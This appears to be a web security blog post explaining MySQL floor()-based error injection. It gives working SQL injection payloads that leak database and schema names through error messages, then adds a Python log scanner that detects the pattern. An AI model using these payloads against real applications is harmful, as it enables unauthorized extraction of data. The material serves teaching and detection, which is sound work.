Web Security

MySQL floor() Error-Based Injection

Posted on 2020-01-02, 2 min read

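Introduction
The error comes from a conflict between floor, count and group by: when the three are used together under certain conditions, MySQL raises an error.
The classic floor injection statement: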

and select 1 from(select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a
select count(*),floor(rand(0)*2)x from test group by x

Here x is a user-defined alias in the SQL statement, which works like an assignment:

x=floor(rand(0)*2)

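Once this is combined with group by x, the query raises an error. For example,
select count(*),concat(database(),floor(rand(0)*2))x from test group by x
raises an error.

In the test1 that appears in the error, test is the database name and 1 is the value returned by floor(rand(0)*2); concat joins the two, giving test1.
The part whose value shows up in the error is the first argument: concat(<error point>,floor(rand(0)*2))x
Substitute our own SQL statement there: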

select count(*),concat((select schema_name from information_schema.schemata),floor(rand(0)*2))x from information_schema.tables group by x


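Try it on the SQL injection page.
Change the SQL statement to:
id=1 and 1=(select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
id=1 is True.
and 1=<result of the SQL statement>: what the comparison evaluates to does not matter, because the statement is executed and raises the error either way.
Dumping the database names:
id=1 and 1=(select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Step through the rows one at a time with limit.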
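
On the detection side, the requests above share a recognizable shape: floor(rand(...)*2) appearing together with count( and group by. The following is an added example, not part of the original post: a small Python scanner that normalizes request URLs and flags that shape in web access logs. The log format, the /item.php path, the client addresses and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Inline comments (/**/) can stand in for spaces, so treat them as whitespace.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Core of the technique: floor(rand(<seed>)*2) used as the grouping key.
_FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)")
_GROUP_BY = re.compile(r"\bgroup\s+by\b")
_COUNT = re.compile(r"\bcount\s*\(")
# Access-log shape assumed here: client address first, request line in quotes.
_REQUEST = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+)')

def normalize(value):
    """Decode twice (double encoding), drop comments, lowercase, collapse spaces."""
    for _ in range(2):
        value = unquote_plus(value)
    return re.sub(r"\s+", " ", _COMMENT.sub(" ", value).lower())

def is_floor_error_injection(value):
    """True when floor(rand()*2), count( and group by all appear together."""
    s = normalize(value)
    return bool(_FLOOR_RAND.search(s) and _GROUP_BY.search(s) and _COUNT.search(s))

def scan(log_lines):
    """Return (line number, client address) for each matching access-log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        m = _REQUEST.match(line)
        if m and is_floor_error_injection(m.group(2)):
            hits.append((number, m.group(1)))
    return hits

# Constructed sample data: this page's request in three encodings plus two benign requests.
_PAGE_QUERY = ("id=1 and 1=(select 1 from (select count(*),concat(database(),"
               "floor(rand(0)*2))x from information_schema.tables group by x)a)")

def _line(client, query):
    return f'{client} - - [02/Jan/2020:10:00:00 +0000] "GET /item.php?{query} HTTP/1.1" 200 512'

SAMPLE_LOG = [
    _line("203.0.113.7", "id=1"),
    _line("203.0.113.9", _PAGE_QUERY.replace(" ", "%20")),
    _line("198.51.100.4", _PAGE_QUERY.upper().replace(" ", "/**/")),
    _line("198.51.100.8", _PAGE_QUERY.replace(" ", "%2520")),
    _line("192.0.2.15", "q=floor+plan&sort=group+by+price&count=10"),
]

for number, client in scan(SAMPLE_LOG):
    print(f"line {number}: floor()/group by error-injection pattern from {client}")
```

A match is a triage signal, not a fix: the query still has to be parameterized, and database error text should not be returned to the client.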
